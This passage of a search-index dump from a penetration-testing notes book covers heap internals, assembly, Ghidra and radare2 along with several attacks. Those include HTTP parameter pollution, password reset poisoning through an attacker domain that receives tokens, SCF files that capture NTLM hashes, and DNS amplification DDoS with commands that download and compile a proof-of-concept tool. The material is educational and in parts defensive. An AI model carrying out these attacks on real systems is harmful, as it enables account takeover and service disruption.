chunks of size 16, 24, 32, 40, 48, 56, 64, 72, 80, and 88 bytes plus chunk metadata. Fast bins are implemented as singly linked lists and insertions and removals of entries in them are really fast. Periodically, the heap manager consolidates the heap - chunks in the fast bins are merged with the abutting chunks and inserted into the unsorted bin. This consolidation occurs when a malloc request is issued for a size that is larger than a fast bin can serve (chunks over 512 bytes on 32-bit systems and over 1024 bytes on 64-bit systems), when freeing a chunk larger than 64KB or when malloc_trim or mallopt is invoked.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Fast Bins","id":"301","title":"Fast Bins"},"302":{"body":"A new caching mechanism called tcache (thread local caching) was introduced in glibc version 2.26 back in 2017. The tcache stores bins of fixed size small chunks as singly linked lists. Similarly to a fast bin, chunks in tcache bins aren't merged with adjoining chunks. By default, there are 64 tcache bins, each containing a maximum of 7 same-sized chunks. The possible chunk sizes range from 12 to 516 bytes on 32-bit systems and from 24 to 1032 bytes on 64-bit systems. When a chunk is freed, the heap manager checks if the chunk fits into a tcache bin corresponding to that chunk size. If the tcache bin for this size is full or the chunk is simply too big to fit into a tcache bin, the heap manager obtains a lock on the arena and proceeds to comb through other bins in order to find a suitable one for the chunk. When malloc needs to service a request, it first checks the tcache for a chunk of the requested size that is available and should such a chunk be found, malloc will return it without ever having to obtain a lock. If the chunk too big, malloc continues as before. A slightly different strategy is employed if the requested chunk size does have a corresponding tcache bin, but that bin is simply full. In that case, malloc obtains a lock and promotes as many heap chunks of the requested size to tcache chunks, up to the tcache bin limit of 7. Subsequently, the last matching chunk is returned.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » TCache Bins","id":"302","title":"TCache Bins"},"303":{"body":"","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » malloc and free","id":"303","title":"malloc and free"},"304":{"body":"First, every allocation exists as a memory chunk which is aligned and contains metadata as well as the region the programmer wants. When a programmer requests memory from the heap, the heap manager first works out what chunk size the allocation request corresponds to, and then searches for the memory in the following order: If the size corresponds with a tcache bin and there is a tcache chunk available, return that immediately. If the request is huge, allocate a chunk off-heap via mmap. Otherwise obtain the arena heap lock and then perform the following steps, in order: Try the fastbin/smallbin recycling strategy If a corresponding fast bin exists, try and find a chunk from there (and also opportunistically prefill the tcache with entries from the fast bin). Otherwise, if a corresponding small bin exists, allocate from there (opportunistically prefilling the tcache as we go). Resolve all the deferred frees - Otherwise merge the entries in the fast bins and move their consolidated chunks to the unsorted bin. - Go through each entry in the unsorted bin. If it is suitable, return it. Otherwise, put the unsorted entry on its corresponding small/large bin as we go (possibly promoting small entries to the tcache). Default back to the basic recycling strategy If the chunk size corresponds with a large bin, search the corresponding large bin now. Create a new chunk from scratch Otherwise, there are no chunks available, so try and get a chunk from the top of the heap. If the top of the heap is not big enough, extend it using sbrk. If the top of the heap can’t be extended because we ran into something else in the address space, create a discontinuous extension using mmap and allocate from there If all else fails, return NULL.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocation","id":"304","title":"Allocation"},"305":{"body":"If the pointer is NULL, do nothing. Otherwise, convert the pointer back to a chunk by subtracting the size of the chunk metadata. Perform a few sanity checks on the chunk, and abort if the sanity checks fail. If the chunk fits into a tcache bin, store it there. If the chunk has the M bit set, give it back to the operating system via munmap. Otherwise we obtain the arena heap lock and then: If the chunk fits into a fastbin, put it on the corresponding fastbin. If the chunk size is greater than 64KB, consolidate the fastbins immediately and put the resulting merged chunks on the unsorted bin. Merge the chunk backwards and forwards with neighboring freed chunks in the small, large, and unsorted bins. If the resulting chunk lies at the top of the heap, merge it into the top chunk. Otherwise store it in the unsorted bin.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Deallocation","id":"305","title":"Deallocation"},"306":{"body":"Registers are value containers which reside on the CPU and not in RAM. They are small in size and some have special purposes. You may store both addresses and values in registers and depending on the instruction used the data inside will be interpreted in a different way - this is commonly called an addressing mode . In x86 Intel assembly (i386), the registers are 32 bits (4 bytes) in size and some of them are reserved: ebp - the base pointer, points to the bottom of the current stack frame esp - the stack pointer, points to the top of the current stack frame eip - the instruction pointer, points to the next instruction to be executed The other registers are general purpose registers and can be used for anything you like: eax, ebx, ecx, edx, esi, edi. x64 AMD assembly (amd64) extends these 32-bit registers to 64-bit ones and denotes these new versions by replacing the initial e with an r: rbp, rsp, rip, rax, ... It is important to note that these are not different registers - eax and rax refer to the same space on the CPU, however, eax only provides access to the lower 32 bits of the 64-bit register. You can also get access to the lower 16 and 8 bits of the register using different names: 8 Byte Register Lower 4 Bytes Lower 2 Bytes Lower Byte rbp ebp bp bpl rsp esp sp spl rip eip rax eax ax al rbx ebx bx bl rcx ecx cx cl rdx edx dx dl rsi esi si sil rdi edi di dil r8 r8d r8w r8b r9 r9d r9w r9b r10 r10d r10w r10b r11 r11d r11w r11b r12 r12d r12w r12b r13 r13d r13w r13b r14 r14d r14w r14b r15 r15d r15w r15b Each row contains names which refer to different parts of the same register. Note, you cannot access the lower 16 or 8 bits of the instruction pointer. You might sometimes see WORD or DWORD being used in a similar context - WORD means 4 bytes and DWORD means 8 bytes.","breadcrumbs":"Reverse Engineering » Program Anatomy » Registers » Registers","id":"306","title":"Registers"},"307":{"body":"Under x64 Linux, function arguments are passed via registers: rdi: First Argument\nrsi: Second Argument\nrdx: Third Argument\nrcx: Fourth Argument\nr8: Fifth Argument\nr9: Sixth Argument The return value is store in rax (eax on 32-bit machines).","breadcrumbs":"Reverse Engineering » Program Anatomy » Registers » Register Use in x64 Linux","id":"307","title":"Register Use in x64 Linux"},"308":{"body":"Register dereferencing occurs when the value of the register is treated as an address to the actual data to be used, rather than the data itself. This means that addressed can be stored in registers and used later - this is useful when dealing with large data sizes. For example, mov rax, [rdx] Will check the value inside rdx and treat it as an address - it will go to the location where this address points and get its data from there. It will then move this data into rax. If we hadn't used [], it would have treated the address in rdx simply as a value and moved it directly into rax.","breadcrumbs":"Reverse Engineering » Program Anatomy » Registers » Register Dereferencing","id":"308","title":"Register Dereferencing"},"309":{"body":"Ghidra is an open-source framework for reverse engineering developed by the NSA. It groups binaries into projects which can be shared amonst multiple people.","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Introduction","id":"309","title":"Introduction"},"31":{"body":"You will need working knowledge of SNMP in order to follow through.","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » Introduction","id":"31","title":"Introduction"},"310":{"body":"To install Ghidra, you can run sudo apt install ghidra.","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Installation","id":"310","title":"Installation"},"311":{"body":"File -> New Project Non-Shared Project Select Directory Name the Project","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Creating a Project and Loading a Binary » Creating a Project","id":"311","title":"Creating a Project"},"312":{"body":"File -> Import File Select the binary you want to import Ghidra will automatically detect certain information about the file After importing, Ghidra will display an Import Results Summary containing information about the binary","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Creating a Project and Loading a Binary » Loading a Binary","id":"312","title":"Loading a Binary"},"313":{"body":"Double-clicking on a program will open it in the Code Browser. A prompt will appear for analysing the binary. Ghidra will attempt to create and label functions, as well as identify any cross-references in memory. Once the binary has been analysed you will be presented with the following screen:","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Initial Analysis » Initial Analysis","id":"313","title":"Initial Analysis"},"314":{"body":"radare2 is an open-source framework for reverse engineering. The framework includes multiple tools which all work in tandem in order to aid in the analysis of binary files. It uses short abbreviations for its commands - single letters - and many of its commands have subcommands which are also expressed as single letters. Luckily, you can always append a ? to a specific command in order to view its subcommands and what they do. To quit radare2, use the q command.","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Introduction","id":"314","title":"Introduction"},"315":{"body":"You can load a binary by invoking the r2 command. You might sometimes need to also add the -e io.cache=true option in order to fix relocations in disassembly.","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Loading a Binary","id":"315","title":"Loading a Binary"},"316":{"body":"aaa - analyse the binary afl - list the analysed functions axt - list all the places where a function is called. Note, you need to use the flag name that redare automatically creates for funtions after aaa.","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Analysis » Analysis","id":"316","title":"Analysis"},"317":{"body":"/ - search the bytes of the binary for a specific string /w - search for wide character strings like Unicode symbols","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Strings » Strings","id":"317","title":"Strings"},"318":{"body":"i - display file information ie - find the program's entry point iM - find the program's main function iz - pull the hard-coded strings from the executable (only the data sections), use izz to get the strings from the entire binary","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Binary Info » Binary Info","id":"318","title":"Binary Info"},"319":{"body":"Flags resemble bookmarks. They associate a name with a given offset in a file. Create a new flag f @ offset You can also remove a flag by appending - to the command: f- List available flags - f: Rename a flag fr ","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Flags » Flags","id":"319","title":"Flags"},"32":{"body":"snmp-check is a simple utility for basic SNMP enumeration. You only need to provide it with the IP address to enumerate: snmp-check [IP] Furthermore, you have the following command-line options: -p: Change the port to enumerate. Default is 161. -c: Change the community string to use. Default is public -v: Change the SNMP version to use. Default is v1. There are additional arguments that can be provided but these are the salient ones.","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » SNMP Enumeration using snmp-check","id":"32","title":"SNMP Enumeration using snmp-check"},"320":{"body":"Flag names should be unique for addressing reasons. However, it is often the case that you need to have simple and ubiquitous names like loop or return. For this purpose exist the so-called \"local\" flags, which are tied to the function where they reside. It is possible to add them using f. command:","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Flags » Local Flags","id":"320","title":"Local Flags"},"321":{"body":"Flags can be grouped into flag spaces - is a namespace for flags, grouping together similar flags. Some flag spaces include sections, registers, symbols. These are managed with the fs command. [0x00001080]> fs?\nUsage: fs [*] [+-][flagspace|addr] # Manage flagspaces\n| fs display flagspaces\n| fs* display flagspaces as r2 commands\n| fsj display flagspaces in JSON\n| fs * select all flagspaces\n| fs flagspace select flagspace or create if it doesn't exist\n| fs-flagspace remove flagspace\n| fs-* remove all flagspaces\n| fs+foo push previous flagspace and set\n| fs- pop to the previous flagspace\n| fs-. remove the current flagspace\n| fsq list flagspaces in quiet mode\n| fsm [addr] move flags at given address to the current flagspace\n| fss display flagspaces stack\n| fss* display flagspaces stack in r2 commands\n| fssj display flagspaces stack in JSON\n| fsr newname rename selected flagspace","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Flags » Flag Spaces","id":"321","title":"Flag Spaces"},"322":{"body":"Moving around the file requires the usage of the seek (s) command in order to change the offset at which we are. It takes one argument which is a mathematical expression capable of containing flag names, parenthesis, addition, substraction, multiplication of immediates of contents of memory using brackets. Examples: [0x00000000]> s 0x10\n[0x00000010]> s+4\n[0x00000014]> s-\n[0x00000010]> s+\n[0x00000014]> Here is a list of additional seeking commands: [0x00000000]> s?\nUsage: s # Help for the seek commands. See ?$? to see all variables\n| s Print current address\n| s.hexoff Seek honoring a base from core->offset\n| s:pad Print current address with N padded zeros (defaults to 8)\n| s addr Seek to address\n| s- Undo seek\n| s-* Reset undo seek history\n| s- n Seek n bytes backward\n| s--[n] Seek blocksize bytes backward (/=n)\n| s+ Redo seek\n| s+ n Seek n bytes forward\n| s++[n] Seek blocksize bytes forward (/=n)\n| s[j*=!] List undo seek history (JSON, =list, *r2, !=names, s==)\n| s/ DATA Search for next occurrence of 'DATA'\n| s/x 9091 Search for next occurrence of \\x90\\x91\n| sa [[+-]a] [asz] Seek asz (or bsize) aligned to addr\n| sb Seek aligned to bb start\n| sC[?] string Seek to comment matching given string\n| sf Seek to next function (f->addr+f->size)\n| sf function Seek to address of specified function\n| sf. Seek to the beginning of current function\n| sg/sG Seek begin (sg) or end (sG) of section or file\n| sl[?] [+-]line Seek to line\n| sn/sp ([nkey]) Seek to next/prev location, as specified by scr.nkey\n| so [N] Seek to N next opcode(s)\n| sr pc Seek to register\n| ss Seek silently (without adding an entry to the seek history) > 3s++ ; 3 times block-seeking\n> s 10+0x80 ; seek at 0x80+10","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Seeking » Seeking","id":"322","title":"Seeking"},"323":{"body":"","breadcrumbs":"Reverse Engineering » Assembly Programming » Introduction","id":"323","title":"Introduction"},"324":{"body":"","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Introduction","id":"324","title":"Introduction"},"325":{"body":"Variables in assembly do not exists in the same sense as they do in higher-level programming languages. This is especially true of local variabls such as those inside functions. Instead of allocating space for a particular value and having that place be \"named\" according to a variable, the compiler may use a combination of stack and heap allocations as well as registers to achieve behaviour resembling a variable. That being said, there are some parallels with higher-level programming languages as well. When manually programming assembly, it should be noted that variable names are more or less identical to addresses.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Introduction","id":"325","title":"Introduction"},"326":{"body":"Assembly constants cannot be changed during run-time execution. Their value is substituted at assembly-time (corresponding to compile-time substitution for constants in higher-level languages). Consequently, constants are not even assigned a location in memory, for they turn into hard-coded values. Defining constants in assembly is done in the following way: equ For example, EXAMPLE equ 0xdeadbeef","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Constants","id":"326","title":"Constants"},"327":{"body":"Static or global variables which are initialised before the programme executes are stored in the .data section. In order to define such a variable, you must give it a name, data size and value. In contrast with constants, such data can be mutated during run-time. The following data size declarations can be used: Declaration Size (in bits) Type db 8 dw 16 dd 32 dq 64 ddq 128 Integer dt 128 Floating-Point The syntax for declaring such variables is as follows: For example: byteVar db 0x1A ; byte variable","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Static Initialised Data","id":"327","title":"Static Initialised Data"},"328":{"body":"Static uninitialised data is stored in the .bss section. The syntax for allocating such variables is following: Such variables are usually allocated as chunks, hence the required count. The primary data types are as follows: Declaration Size (in bits) resb 8 resw 16 resd 32 resq 64 resdq 128 Some examples: bArr resb 10 ; 10 element byte array wArr resw 50 ; 50 element word array dArr resd 100 ; 100 element double array qArr resq 200 ; 200 element quad array","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Static Uninitialised Data","id":"328","title":"Static Uninitialised Data"},"329":{"body":"Data representation refers to the way that values are stored in a computer. For technical reasons, computers do not use the familiar base-10 number system but rather avail themselves of the base-2 (binary) system. Under this paradigm, numbers are represented as 1's and 0's.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Data Representation » Introduction","id":"329","title":"Introduction"},"33":{"body":"snmpwalk is a much more versatile tool for SNMP enumeration. It's syntax is mostly the same as snmp-check:","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » SNMP Enumeration using snmpwalk","id":"33","title":"SNMP Enumeration using snmpwalk"},"330":{"body":"When storing an integer value, there are two ways to represent it - signed and unsigned - depending on whether the value should be entirely non-negative or may also have a \"-\" sign. Based on the number of bits used for storing a value, the value may have a different range. Size Range Size Unsigned Range Signed Range Byte (8 bits) 28 [0..255] [−128..+127] Word (16 bits) 216 [0..65,535] [−32,768..+32,767] Doubleword (32 bits) 232 [0..4,294,967,295] [−2,147,483,648..+2,147,483,647] Quadword (64 bits) 264 [0..264−1] [−263..+263−1] Double Quadword (128 bits) 2128 [0..2128−1] [−2127..+2127−1] Unsigned integers are represented in their typical binary form.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Data Representation » Integer Representation","id":"330","title":"Integer Representation"},"331":{"body":"Signed integers are represented using two's complement. In order to convert a acquire the negative form of a number in two's complement, is two negate all of its bits and add 1 to the number. A corollary of this representation is that it adds no complexity to the addition and subtraction operations.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Data Representation » Two's Complement","id":"331","title":"Two's Complement"},"332":{"body":"Addressing modes refer to the supported methods for accessing and manipulating data. There are three basic addressing modes in x86-64: register, immediate and memory.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Introduction","id":"332","title":"Introduction"},"333":{"body":"In register mode addressing, the operand is a register ( brain undergoing nuclear-fission ). mov rax, rbx The value inside rbx is copied to rax.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Register Mode Addressing","id":"333","title":"Register Mode Addressing"},"334":{"body":"In immediate mode addressing, the operand is an immediate value, or a literal . These are simply constant values such as 10, 0xfa3, \"lol\", and so on. mov rax, 123 The number 123 is copied into rax.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Immediate Mode Addressing","id":"334","title":"Immediate Mode Addressing"},"335":{"body":"In memory mode addressing, the operand is treated as a memory location. This is referred to as indirection or dereferencing and is similar to how pointers can be dereferenced in C/C++. In assembly, this is done by wrapping the operand in square brackets: []. So for example, rax refers to the value stored within the register rax. However, [rax] means \"treat rax like a pointer and use the value it points to\". Essentially, [rax] treats the value inside the register as an address and uses that address to find the actual value it needs. mov DWORD PTR [rax], 0xdeadbeef The value 0xdeadbeef is copied into the location pointed to by rax. Since memory is byte-addressable, it is oftentimes required to specify how many bytes we want to access. This is done by prepending one of the following specifiers to the operand: Specifier Number of Bytes BYTE PTR / byte 1 WORD PTR / word 2 DWORD PTR / dword 4 QWORD PTR / qword 8 Moreover, the actual formula for memory addressing is a bit more complicated, since it was developed mainly for making the implementation of arrays easier. [baseAddr + (indexReg * scaleValue) + offset] The baseAddr must be a register or variable name, although it may be omitted in which case the address is relative to the beginning of the data segment. indexReg is a register which specifies contains an index into the array and the scaleValue is the size (in bytes) of a single member of the array. The offset must be an immediate value. mov eax, dword [ebx] ; move into eax the value which ebx points to\nmov rax, QWORD PTR [rbx + rsi] ; move into rax the value which (rbx + rsi) points to\nmov rcx, qword [rax+(rsi*8)] ; move into rcx the value which (rax + (rsi*8)) points to","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Memory Mode Addressing","id":"335","title":"Memory Mode Addressing"},"336":{"body":"Memory is nothing more than a series of bytes which can be individually addressed. When storing values which are larger than a single byte, the bytes under the x86-64 paradigms are stored in little-endian order - the least significant byte (LSB) at the lowest memory address and the most significant byte (MSB) at the highest memory address. For example, the variable var = 0xDEADBEEF would be represented in memory as follows: Note how the right-most byte is at a lower address and the addresses for the rest of the bytes increase as we go right-to-left.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Memory » Endianness","id":"336","title":"Endianness"},"337":{"body":"Below is the general memory layout of a programme: The reserved section is unavailable to user programmes. The .text sections stores the instructions which comprise the programme's code. Static variables which were declared and given a value at assemble-time are stored in the .data section. The .bss section stores static uninitialised data, i.e variables which were declared but were not provided with an initial value. If such variables are used before they are initialised, their value will be meaningless. The Stack and the Heap are where data can be allocated at run-time. The Stack is used for allocating space for small amounts of data with a size known at compile-time and grows from higher to lower addresses. Conversely, the Heap allows for the dynamic allocation of space for data of size known at run-time and grows from lower to higher addresses.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Memory » Memory Layout","id":"337","title":"Memory Layout"},"338":{"body":"Registers are value containers which reside on the CPU (separately from RAM). They are small in size and some have special purposes. x86-64 assembly operates with 16 general-purpose registers (GPRs). It should be noted that the 8-byte (r) variants do not exist in 32-bit mode. 64-bit Register Lower 4 Bytes Lower 2 Bytes Lower 1 Byte rbp ebp bp bpl rsp esp sp spl rip eip rax eax ax al rbx ebx bx bl rcx ecx cx cl rdx edx dx dl rsi esi si sil rdi edi di dil r8 r8d r8w r8b r9 r9d r9w r9b r10 r10d r10w r10b r11 r11d r11w r11b r12 r12d r12w r12b r13 r13d r13w r13b r14 r14d r14w r14b r15 r15d r15w r15b Each row contains names which refer to different parts of the same register. Note, the lower 16 bits of the rip register (instruction pointer) are inaccessible on their own. For example, the rax register could be set to the following: rax = 0x0000 000AB 10CA 07F0 The name eax would then only refer to the part of the rax register which contains 10CA 07F0. Similarly, ax would represent 07F0, and al would be just F0. Additionally, the upper byte of ax, bx, cx and dx may be separately accessed by means of the ah, bh, ch and dh monikers, which exist for legacy reasons.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » Introduction","id":"338","title":"Introduction"},"339":{"body":"Not all registers available in the x86-64 paradigm are created equal. Certain registers are reserved for specific purposes, despite being called general-purpose.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » Register Specialisation","id":"339","title":"Register Specialisation"},"34":{"body":"Notwithstanding its age, onesixtyone is a good tool which allows you to bruteforce community strings by specifying a file instead of a single string with its -c option. It's syntax is rather simple:","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » Bruteforce community strings with onesixtyone","id":"34","title":"Bruteforce community strings with onesixtyone"},"340":{"body":"The stack pointer rsp (esp for 32-bit machines) is used to point to the current top of the stack and should not be used for any other purpose other than in instructions which involve stack manipulation.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Stack Pointer rsp","id":"340","title":"The Stack Pointer rsp"},"341":{"body":"The base pointer rbp (ebp for 32-bit machines) is the twin brother of the stack pointer and is used as a base pointer when calling functions. It points to the beginning of the current function's stack frame. Interestingly enough, its use is actually gratuitous because compilers can manage the stack frames of functions equally well without a separate base pointer. It is mostly used to make assembly code more comprehensible for humans.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Base Pointer rbp","id":"341","title":"The Base Pointer rbp"},"342":{"body":"The instruction pointer rip (eip for 32-bit machines) points to the next instruction to be executed. It is paramount not to get confused when using a debugger, since the rip does not actually point to the instruction currently being executed.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Instruction Pointer rip","id":"342","title":"The Instruction Pointer rip"},"343":{"body":"The flag register rFlags (eFlags for 32-bit machines) is an isolated register which is automatically updated by the CPU after every instruction and is not directly accessible by programmes. Following is a table of the meaning assigned to different bits of this register. Note that only the lower 32 bits are used even on 64-bit machines. Name Symbol Bit Usage =1 =0 Carry CF 0 Indicates whether the previous operation resulted in a carry-over. CY (Carry) CN (No Carry) 1 Reserved. Always set to 1 for eFlags. Parity PF 2 Indicates whether the least significant byte of the previous instruction's result has an even number of 1's. PE (Parity Even) PO (Parity Odd) 3 Reserved. Auxiliary Carry AF 4 Used to support binary-coded decimal operations. AC (Auxiliary Carry) NA (No Auxiliary Carry) 5 Reserved. Zero ZF 6 Indicates whether the previous operation resulted in a zero. ZR (Zero) NZ (Not Zero) Sign SF 7 Indicates whether the most significant bit was set to 1 in the previous operation (implies a negative result in signed-data contexts). NG (Negative) PL (Positive) Trap TF 8 Used by debuggers when single-stepping through a programme. Interrupt Enable IF 9 Indicates whether or not the CPU should immediately respond to maskable hardware interrupts. EI (Enable Interrupt) DI (Disable Interrupt) Direction DF 10 Indicates the direction in which several bytes of data should be copied from one location to another. DN (Down) UP (Up) Overflow OF 11 Indicates whether the previous operation resulted in an integer overflow. OV (Overflow) NV (No Overflow) I/O Privilege Level IOPL 12-13 Nested Task NT 14 Mode MD 15 Resume RF 16 Virtual 8086 Mode VM 17 31-63 Reserved.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Flag Register rFlags","id":"343","title":"The Flag Register rFlags"},"344":{"body":"In addition to the aforementioned registers, the x86-64 paradigm includes 16 registers, xmm[0-15], which are used for 32- and 64-bit floating-point operations. Furthermore, the same registers are used to support the Streaming SIMD Extensions (SSE) which allow for the execution of Single Instruction Multiple Data (SIMD) instructions.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » Floating-Point Registers and SSE","id":"344","title":"Floating-Point Registers and SSE"},"345":{"body":"The x86-64 assembly paradigm has quite a lot of different instructions available at its disposal. An instructions consists of an operation and a set of operands where the latter specify the data and the former specifies what is to be done to that data.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Instruction Set » Introduction","id":"345","title":"Introduction"},"346":{"body":"Typically, instruction signatures are represented using the following operand notation. Operand Notation Description Register operand. , , , Register operand with a specific size requirement. Source operand. Destination operand - this may be a register or memory location. Floating-point destination register operand. Immediate value (a literal). Base-10 by default, but can be preceded with 0x to make it hexadecimal. Memory location - a variable name or an address. Arbitrary operand - immediate value, register or memory location. .'\">View Me! Here, a new URL is generated based on the value of a parameter $val. Here, the attacker passes the value 123%26action=edit onto the parameter. The URL-encoded value for & is %26. When this gets to the htmlspecialchars function, the %26 gets converted to an &. When the URL gets formed, it becomes And since this is view as HTML, an additional parameter has been smuggled! The link would be equivalent to /page.php? action=view&par=123&action=edit This second action parameter could cause unexpected behaviour based on how the server handles duplicate requests.","breadcrumbs":"Exploitation » Web » HTTP Parameter Pollution » Client-Side HPP","id":"144","title":"Client-Side HPP"},"145":{"body":"The HTTP Host header is a mandatory header for HTTP requests and specifies the domain name which the client wants to access. This is especially handy with virtual hosting because a single IP address may provide different services on different domains and the server needs to know which page to return to the client. For example, the same machine may serve a blog website at blog.example.com and a git repository at dev.example.com. In order to specify which of the two services the client wants to access, they must specify either the header Host: blog.example.com or dev.example.com, respectively, in their request. A host header injection vulnerability arises when the target application unsafely uses the contents of the Host header, typically in order to construct an absolute URL.","breadcrumbs":"Exploitation » Web » Host Header Injection » Introduction","id":"145","title":"Introduction"},"146":{"body":"This technique involves using Host Header Injection in order to force a vulnerable application to generate a password reset link which points to a malicious domain. This may be leveraged to steal the secret tokens required to reset the passwords of arbitrary users and consequently compromise their accounts. Typically applications implement password resetting as follows. The user specifies their username/email. The server generates a temporary, unique, high-entropy token for the user. The server generates a URL for the password reset with the secret token included as a URL parameter. For example, example.com/reset?token=abcdefghijklmnopqrstuvwxyz The server sends an email to the client which includes the generated password reset link. When the user clicks the link in their email, the token in the URL is used by server in order to determine whose password is being reset and whether or not it is a valid request. If the Host header of the request for a password reset is used in generating the password reset URL, an adversary may leverage it in order to steal the token for an arbitrary user. For example, an adversary could submit a password reset request for a user, e.g. carlos, intercept the request and modify the Host header to point to a domain controlled by them: Host: exploit-server.com. When the server generates the password reset URL, it will resemble the following, http://exploit-server.com/reset?token=abcdefghijklmnopqrstuvwxyz. If the victim clicks on the link, their token will be handed over to the attacker by means of the exploit-server.com domain which receives the password reset request. This type of attack, however, does not always require user interaction because emails are typically scanned be it to determine if they are spam or if they contain a virus and the scanners will oftentimes open the links themselves, all automatically, thus giving the attacker the token to reset the password.","breadcrumbs":"Exploitation » Web » Host Header Injection » Password Reset Poisoning","id":"146","title":"Password Reset Poisoning"},"147":{"body":"Check to see if absolute URLs are necessary and cannot be replaced with relative ones. If an absolute URL is necessary, ensure that the current domain is stored in a configuration file and do NOT use the one from the Host: header. If using the Host header is inevitable, ensure that it is validated against a whitelist of permitted domains. Different frameworks may provide different methods for achieving this. Drop support for additional headers which may permit such attacks, such as the X-Forward-Host header. Do NOT virtual-host internal-only websites on a server which also provides public-facing content, since those may be accessed via manipulation of the Host header.","breadcrumbs":"Exploitation » Web » Host Header Injection » Prevention","id":"147","title":"Prevention"},"148":{"body":"","breadcrumbs":"Exploitation » Windows » Windows","id":"148","title":"Windows"},"149":{"body":"Shell Command Files (SCF) permit a limited set of operations and are executed upon browsing to the location where they are stored. What makes them interesting is the fact that they can communicate through SMB, which means that it is possible to extract NTLM hashes from Windows hosts. This can be achieved if you are provided with write access to an SMB share.","breadcrumbs":"Exploitation » Windows » SCF File Attacks » Introduction","id":"149","title":"Introduction"},"15":{"body":"This is the process of discovering active hosts on a network, either for attacking them or assessing the overall network security.","breadcrumbs":"Reconnaissance » Enumeration » Network Scanning","id":"15","title":"Network Scanning"},"150":{"body":"You will first need to create a malicious .scf file where you are going to write a simple (you can scarcely even call it that) script.","breadcrumbs":"Exploitation » Windows » SCF File Attacks » The Attack","id":"150","title":"The Attack"},"151":{"body":"","breadcrumbs":"Exploitation » DNS » DNS","id":"151","title":"DNS"},"152":{"body":"A DNS (Traffic) Amplificaton attack is a popular form of a distributed denial of service (DDoS) attack, which abuses open DNS resolvers to flood a target system with DNS response traffic. It's called an amplification attack because it uses DNS responses to upscale the size of the data sent to the victim.","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » What is DNS Traffic Amplification?","id":"152","title":"What is DNS Traffic Amplification?"},"153":{"body":"An attacker sends a DNS name lookup to an open resolver with the source IP spoofed to be the victim's IP address. That way, any response traffic would be sent to the victim and not the attacker. The requests submitted by the attacker usually aim to query for as much information as possible in order to maximise the amplification effect. In most cases, the queries sent are of type ANY which requests all known information about a particular DNS zone. Using a botnet, it's easy to create immense amounts of traffic. It is also rather difficult to protect against these attacks because the traffic is coming from legitimate sources - real DNS servers.","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » How does it work?","id":"153","title":"How does it work?"},"154":{"body":"","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » Conducting a DNS Traffic Amplification Attack","id":"154","title":"Conducting a DNS Traffic Amplification Attack"},"155":{"body":"We should first check if a DNS Traffic Amplification is possible and if it's viable. We can do this through Metasploit using the module auxiliary/scanner/dns/dns_amp. In the RHOSTS you need to put the IP of the name server you want to test. This module will tell you if a name server can be used in an amplification attack but won't actually execute the attack. Run the scanner:","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » Testing a DNS server for attack surface","id":"155","title":"Testing a DNS server for attack surface"},"156":{"body":"A simple tool is available only as a proof of concept here . You will need to download and then compile it: wget https://raw.githubusercontent.com/rodarima/lsi/master/entrega/p2/dnsdrdos.c gcc -o dnsdrdos dnsdrdos.c -Wall -ansi ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ wget https://raw.githubusercontent.com/rodarima/lsi/master/entrega/p2/dnsdrdos.c\n--2021-09-21 13:01:11-- https://raw.githubusercontent.com/rodarima/lsi/master/entrega/p2/dnsdrdos.c\nResolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.111.133, 185.199.110.133, ...\nConnecting to 